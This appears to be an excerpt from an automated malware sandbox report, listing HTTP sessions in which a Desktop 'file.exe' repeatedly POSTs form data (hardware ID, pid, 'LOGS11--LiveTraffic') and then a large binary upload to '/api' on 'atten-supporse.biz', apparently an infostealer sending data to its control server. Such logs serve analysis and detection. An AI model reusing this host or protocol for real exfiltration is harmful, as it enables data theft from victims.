2024-12-09 21:35:06 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NRG4EX5TSVGAG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: atten-supporse.biz
2024-12-09 21:35:06 UTC	12811	OUT	Data Raw: 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 52 47 34 45 Data Ascii: --NRG4EX5TSVGAGContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--NRG4EX5TSVGAGContent-Disposition: form-data; name="pid"2--NRG4EX5TSVGAGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--NRG4E
2024-12-09 21:35:08 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fam5ut65e975tpv9q9s9l4pgh9; expires=Fri, 04-Apr-2025 15:21:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rxl1oLEbwxp5x2OPLY7ZuAvSjxMvDDA1Q8RbDfrRdTkYUKhRwrpKe71uqsDgOAb5c19g5LTqPYtlvoz1qijkfpUeEEWqXUzOnP4gpOvhBUo%2F1Su9dIAaFDipru3OxzgCrq5%2F6YY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81f802c3843b0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1565&rtt_var=610&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13748&delivery_rate=1760096&cwnd=32&unsent_bytes=0&cid=052aaa8feb28c891&ts=2147&x=0"
2024-12-09 21:35:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 21:35:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:09 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=S3VQX4XMY4AU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15047 Host: atten-supporse.biz
2024-12-09 21:35:09 UTC	15047	OUT	Data Raw: 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 53 33 56 51 58 34 58 4d Data Ascii: --S3VQX4XMY4AUContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--S3VQX4XMY4AUContent-Disposition: form-data; name="pid"2--S3VQX4XMY4AUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--S3VQX4XM
2024-12-09 21:35:11 UTC	1026	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ijpvadahobchfan4pd583rt1n; expires=Fri, 04-Apr-2025 15:21:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkoKGzHMHb6ceTwlc816%2BDdd9eNSNJykp4ti%2BYzegi9Z%2B2Rww5w%2FaGcisaKNf4FjpIrx2eAeTO7qOGFsX%2BingUk%2FeXJXAUKbw7NZ1YmD9N7pLTEijYOdpdqY3x220Qm1cVzE1vo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81f965f8bf797-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1621&rtt_var=635&sent=16&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15983&delivery_rate=1685912&cwnd=151&unsent_bytes=0&cid=fbb3dc7b60226049&ts=2298&x=0"
2024-12-09 21:35:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 21:35:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:13 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8H6WZ2K2HQ3C0E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20549 Host: atten-supporse.biz
2024-12-09 21:35:13 UTC	15331	OUT	Data Raw: 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 48 Data Ascii: --8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="pid"3--8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8H
2024-12-09 21:35:13 UTC	5218	OUT	Data Raw: 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 Data Ascii: Zh'F3Wun 4F([:7s~X`nO`i
2024-12-09 21:35:14 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tpf35er89e1nnttm3ac8dugehb; expires=Fri, 04-Apr-2025 15:21:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1HKer1uAzMV2xTlTCw4oN3SNo74WkcqHMxM%2Fkj9UNj6i3WIzo6FdChZX%2BqocWEJROW4jXmXVhHvUi1lpWleyTfl8DRLAyc7isG8IxqhVVgkHfd%2BA1OKSO%2FM4U2epaEHRtJSNO8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81facff5043b0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1624&rtt_var=615&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21509&delivery_rate=1769696&cwnd=32&unsent_bytes=0&cid=f9410d538cb10a7a&ts=1300&x=0"
2024-12-09 21:35:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 21:35:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:16 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GRNSLLOILUIEJ2IWEAL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1262 Host: atten-supporse.biz
2024-12-09 21:35:16 UTC	1262	OUT	Data Raw: 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="pid"1--GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-09 21:35:16 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 21:35:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0is0svv28v5b5bcofmpn0ge1re; expires=Fri, 04-Apr-2025 15:21:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9cGSnYa8xsxZs5c2JZNJF7o11PzR%2Fu1ctz3WZpiTtQgOCW%2B3aFo8R6rdVW75wnt40Sqlwb5az0Pb9nAxF39WjpxvUoOC7tIRUQlb407rMChsxNMxfdv7U5ckKJP%2BsaBp5IYQkw4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef81fbed82043b0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1651&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2182&delivery_rate=1748502&cwnd=32&unsent_bytes=0&cid=a78036f7a0aec74f&ts=748&x=0"
2024-12-09 21:35:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 21:35:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49713	104.21.48.1	443	2876	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 21:35:18 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NPJSDEQE47W6YAPL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570251 Host: atten-supporse.biz
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --NPJSDEQE47W6YAPLContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--NPJSDEQE47W6YAPLContent-Disposition: form-data; name="pid"1--NPJSDEQE47W6YAPLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: eb 83 a3 60 09 cf 15 96 ac 37 8d ae e6 b7 1c c3 b3 1e f1 58 5f 14 51 ab 9b bf a7 a2 6f 0a 81 87 35 f4 8b a0 bd 8c 37 7b 56 07 18 8c 32 76 09 c9 93 53 65 e7 6a 45 18 14 08 f3 84 93 97 08 bd 1d d0 9c 10 f6 39 b5 0a 05 67 36 c0 4b 63 62 06 bc d5 30 f5 07 e6 5e 0b d6 19 fe 98 69 dd 7e 78 4a a0 b3 34 17 0b 1b 2d d9 e6 15 ef 48 79 b9 8d ba 39 35 6b 5e a5 30 53 aa bc 1a ca 88 cf 99 67 0c 27 61 8e f5 7a 3b 81 28 10 23 0d ce b6 37 e6 e4 b5 a2 3b 1f c3 5d c2 3f f7 80 17 de 62 f4 f9 b6 48 d6 41 a5 85 ae eb 14 2c 7c 5b 0c a7 ef ae c7 4d e2 66 06 ad ba 29 0d 5f 50 f1 14 95 c7 ae 5f 56 d0 4a 83 05 c9 dd c7 75 f5 33 1e 52 eb 27 d0 0d 99 19 d1 e6 d8 98 a9 f2 09 64 66 36 aa 50 94 47 47 ea 5d 1f fe a4 27 b5 27 b1 fd d3 cf 2f b8 1f a6 09 b2 0d d0 c9 a2 64 23 8c 20 d4 85 4d Data Ascii: `7X_Qo57{V2vSejE9g6Kcb0^i~xJ4-Hy95k^0Sg'az;(#7;]?bHA,\|[Mf)_P_VJu3R'df6PGG]''/d# M
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: e2 42 09 bc 73 64 bb 1a e5 cf 9c ab 1f a6 5a 06 17 70 29 d6 ec f4 b4 a1 ec 56 b3 20 fc 74 a4 31 3a 99 98 9c 6b a1 b1 b9 1b d4 a8 af bf 7d 5f 9d ba 80 bc 26 0d 9c 47 bd 43 1a 4d 7d 85 44 4a ad 58 a9 30 b1 6c 09 be a6 39 2c 77 71 53 db 4f 9d b2 4f 80 55 84 8f a5 df 21 27 9d 70 13 12 97 ea fe cc 14 57 1a bb 81 8d 25 70 38 95 78 25 39 5c f7 36 e2 a0 bd a3 83 5e 4f 12 f2 ab 5c 1f 74 7e 9a 4a 8e b8 7b dc bf 7a 8b ce 13 66 98 59 55 de d3 52 7f df 9d a4 d8 30 ea 86 f8 aa f6 c4 db 7d d5 7f 71 fa 3e f4 6a b2 6b 44 52 c2 e7 87 a9 9d ab ee 0f c3 89 a8 fe c7 b4 40 a1 73 ef d7 2b b9 ae bf ca f9 a6 0f 9e 9a f9 a7 e1 93 f3 8f fe a3 b8 39 a3 71 b5 74 e8 aa f3 d8 be b2 8d 1e 66 c9 80 5f c0 c7 e1 d0 b7 dc ae bc cd cf a6 06 11 37 9d 4b 43 2e 37 03 d6 c3 f2 c8 d1 dc 8a d5 d0 Data Ascii: BsdZp)V t1:k}_&GCM}DJX0l9,wqSOOU!'pW%p8x%9\6^O\t~J{zfYUR0}q>jkDR@s+9qtf_7KC.7
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: 3b 44 c7 b7 f6 4b dc 78 e2 ad 5e 73 d5 78 81 5d e3 bd 8a f1 5c 50 2a 59 2a 2f 28 bc 66 41 ed 1a e8 b9 ca 54 a1 de 33 9d d8 f2 b6 f1 3e ab f8 f1 c9 99 41 98 77 0c 49 dd a4 ad f2 56 09 55 7e 7b 3f 3e c9 9d 5d 39 c4 75 63 fd 20 3b e5 af c8 03 5e c5 3a db d9 86 88 c7 74 ab 72 fb 4e 51 26 b1 ed fd 90 c8 6a 97 4f 86 c5 3a 8c 48 85 d8 96 68 c3 dc 5b 11 5a d3 ec c0 de c0 31 88 11 59 80 a6 fc 92 a5 c9 ee 01 65 7b 20 43 6e 30 ae 99 a1 83 85 fb d8 34 07 50 40 07 d9 7f 13 3e 91 b8 a7 6a 54 0c 14 21 50 10 e8 11 38 5f c8 0d 7d ba d0 be bb 81 01 af 10 c2 8b 0b 34 12 c8 9f 94 f3 4c b1 99 f7 f5 b5 b8 f3 2e 1d 3b 0b 47 8f bf ae 53 d3 f7 80 e9 5e 8a 11 20 a7 23 e2 44 37 4c 41 f7 59 61 d6 07 89 16 44 f9 97 60 1c 6c 63 ad f4 6c 78 98 d7 b1 e6 54 4a 77 9f 3e aa bb 9a a8 88 1a Data Ascii: ;DKx^sx]\PY/(fAT3>AwIVU~{?>]9uc ;^:trNQ&jO:Hh[Z1Ye{ Cn04P@>jT!P8_}4L.;GS^ #D7LAYaD`lclxTJw>
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: e6 c6 19 a8 80 ab d9 08 92 3e 29 7a 33 fc 31 71 e9 54 97 4d 9b 02 89 a6 09 74 5c 59 9f 79 4e 71 eb e9 83 b8 56 9b ba 80 1e 6c d6 01 69 99 dd dd fe 2d 29 6a 5b 9f 96 c1 5f dc ad 82 6b 46 a4 f6 3d 99 79 c6 13 d0 c3 af e4 2a 7f 62 d1 a6 c0 d4 a5 a2 95 9a 9a 0a 1f a9 77 fb a2 78 ed 2e c0 ba ac 52 fc 4f 87 df 19 6a b6 69 0b 82 76 5e 23 52 7d bd a0 3f c4 99 26 3e 5b f8 c5 9d 3d 49 68 ef 09 52 60 36 3c 81 64 07 e1 bb 98 99 11 46 e0 1c f3 ab a5 73 b6 1f 76 11 e0 b7 9e 0a 4a ae f3 eb 40 67 aa b0 9d fa 1e 5c 32 cd 73 17 e4 e0 22 b6 c3 3f 43 06 ae e4 52 94 67 27 1e 4a 6a 86 6b a8 5e f4 1a 9c b5 aa f1 4c 2b c0 3d aa 99 19 f3 7b ee 13 35 d6 04 e6 06 13 c8 23 63 f9 cd c4 9d c1 13 c5 38 3b 87 f7 cb 5b e6 88 ea 8d fb 99 ce 27 af 8c a5 2d 5c 18 f0 e9 6d 70 d4 b3 c1 4e 5e Data Ascii: >)z31qTMt\YyNqVli-)j[_kF=y*bwx.ROjiv^#R}?&>[=IhR`6<dFsvJ@g\2s"?CRg'Jjk^L+={5#c8;['-\mpN^
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: a1 85 98 db 93 57 f9 41 d7 1c b7 ad 8d d8 f6 ed 9e ed 09 40 e6 e5 18 02 d6 d0 46 f0 67 4b a7 a0 8f e1 f0 99 06 c4 03 24 26 28 e0 31 38 99 cf 9a 77 fe 3e 30 c9 67 33 3b 4b 7a fb 35 6a a4 2f 37 fc cd 7a 43 2b 33 e5 e3 5e f9 43 2a cf 3f bc fb 0b 49 57 ee 9f c4 df 0d 83 02 ff 19 8f 6c c3 02 1b c1 9d f4 b5 04 d8 c4 d0 42 71 61 ba bf 0c b5 d8 f8 07 94 3b 98 d0 75 f5 01 08 98 de e2 ab a1 5d ec 0f f3 e9 3c 48 92 51 e6 ce f0 94 9e c7 03 ff e5 47 61 24 55 1e 9e 37 fc 78 3b ee 8c 83 18 4c ff 6d 5e 0f 2c 88 e2 35 dd 9a 02 fc 15 3d 6f d0 6d 37 27 0b 5b 45 cb 00 b4 fd 00 f1 ce 69 26 58 f8 62 ad 8d f1 20 86 25 82 b1 23 ba 99 0e 2f ee 4f 5b c6 b7 86 19 98 19 39 14 cf 7d 92 bd 61 ae 61 0f 8b f2 ef 62 df 90 2e 78 4a 01 5b 4a 8c 0e 9f b6 02 e1 c1 50 f9 fd c4 b4 64 78 84 7b Data Ascii: WA@FgK$&(18w>0g3;Kz5j/7zC+3^C*?IWlBqa;u]<HQGa$U7x;Lm^,5=om7'[Ei&Xb %#/O[9}aab.xJ[JPdx{
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: 5d a0 c1 15 ec 05 f5 a1 f0 86 8a 72 86 aa 51 71 0f 71 33 0f 49 04 e1 ca 9c cf 3c b6 83 14 de e5 5b 85 ea f3 3c 5c c5 db 89 c3 d5 69 c9 2b 89 a1 e6 a9 51 b6 01 b4 a5 17 5d 92 36 04 45 9a ad b9 70 cc d3 b0 c5 4b ae 50 cd 52 76 bb 13 4a af 7f de 9d cf 14 c7 37 17 34 cd 9f 9b dd ee 6c 66 e8 b0 d4 6c 86 37 44 6f 4d 95 9b b6 b0 df bd d2 48 78 25 5f 79 ea 37 eb 49 cb 66 83 ff f0 41 52 c7 2f 37 2e a7 b9 94 90 94 39 6e 9d 0c 7d 60 be 02 fd 8b 5b e4 cd 1e 29 7c aa 57 6a 63 7e ff 28 c0 ed 62 8c c8 8c 10 d3 78 36 6c 67 2f 8f d5 0c bc 2b ff 63 bc b0 ab 73 54 18 45 d2 07 7e 72 44 a2 f4 c6 64 4b 21 48 f0 30 c6 6d 3c 64 7f e4 7f 99 8b c1 98 f0 15 72 16 0b 85 b7 bf 6e 6c ae 2c 16 76 09 bb 41 f4 e3 fa 5f e2 35 59 93 5c 57 83 c5 f1 f1 73 b4 12 9e a4 63 04 15 01 2a 6e f7 e7 Data Ascii: ]rQqq3I<[<\i+Q]6EpKPRvJ74lfl7DoMHx%_y7IfAR/7.9n}`[)\|Wjc~(bx6lg/+csTE~rDdK!H0m<drnl,vA_5Y\Wsc*n
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: 2d 70 aa 1f af b6 e9 42 7f 32 a8 fa a6 e9 68 c9 b7 75 13 f3 c2 d5 70 2a ee 5a c3 a5 b4 0c fe e2 82 3a b5 6b af 00 a8 df af 30 41 d2 99 ac e5 cd a6 01 21 39 61 30 a3 a6 32 b5 77 27 5f a9 c9 34 3a fd 2d 76 59 25 72 74 20 d4 98 55 5c 11 04 b0 d8 33 af 85 26 cd 8c 44 97 bd 75 c7 2a d7 f3 10 fd 2f 2b fb 72 bc 6d b8 d5 3f 9f 69 74 37 6f 62 fe b7 c4 42 38 2a 3c e5 35 a0 07 1f 8e 6d 8b fb ce 79 66 b1 d7 28 fc 66 d7 7b 0e c9 ac 8c cd 49 fc 97 70 68 c7 6e e6 cc b3 19 af 1b 10 a5 6c c7 76 99 fe 94 aa 83 4f 42 c9 46 ef 00 c5 c9 5e 0f 0d a4 11 38 ec c9 99 8c 10 a1 ab da ed 43 d7 fc 6f 61 df 9f f7 ec 24 c4 47 10 18 7a 75 48 f2 e5 1e 21 27 11 bd f2 26 74 7f a0 10 63 af db 73 8b a5 6f b7 27 ae 16 dc 4e 6f 6f 39 ee 15 ac 90 6a 73 c6 56 1a 3b 2f 0d 7a 75 a3 0d 2e 9e 45 92 Data Ascii: -pB2hupZ:k0A!9a02w'_4:-vY%rt U\3&Du/+rm?it7obB8*<5myf(f{IphnlvOBF^8Coa$GzuH!'&tcso'Noo9jsV;/zu.E
2024-12-09 21:35:18 UTC	15331	OUT	Data Raw: c7 7e 93 89 94 3b 0f c9 a4 92 3a 58 48 2e 72 fe cb 6d bc d2 b8 d0 eb 1e ca e1 c4 38 6b 6a d7 90 3a d3 11 5b 48 d4 1b 5a b9 47 60 ff b3 9a 31 3d 7e b5 cc 65 32 99 14 4b 36 15 49 f7 6f e8 95 4f 32 00 64 13 8c bc e2 14 e7 8a f2 74 e0 f9 dc 0e 49 d1 43 ea e8 19 c7 fe 02 4a 77 2d ef f5 21 23 3a 39 90 23 b1 f9 7c 6f b7 8a b1 2a 21 a5 31 53 d9 19 49 dc f3 20 4a 78 33 ec 05 b1 bb 96 3f 31 fa b8 03 a9 43 1a c2 96 bc f4 38 80 f0 c2 2f 61 0a 72 31 30 b8 4a 45 48 ae 36 fe 78 73 93 ff 08 44 57 1f 67 b6 86 e9 75 55 1c e7 d5 a2 80 f0 d6 35 e6 08 18 c3 75 0b 82 8e 95 47 75 3f 18 a3 cd fd 12 c2 f8 9a 65 59 5a c1 ee bb 41 a0 ee fc 78 12 07 da ce bb 9b 36 e8 9e ea 6c 0c ee 5c c9 c7 72 98 2a 75 8a 3a a4 92 a1 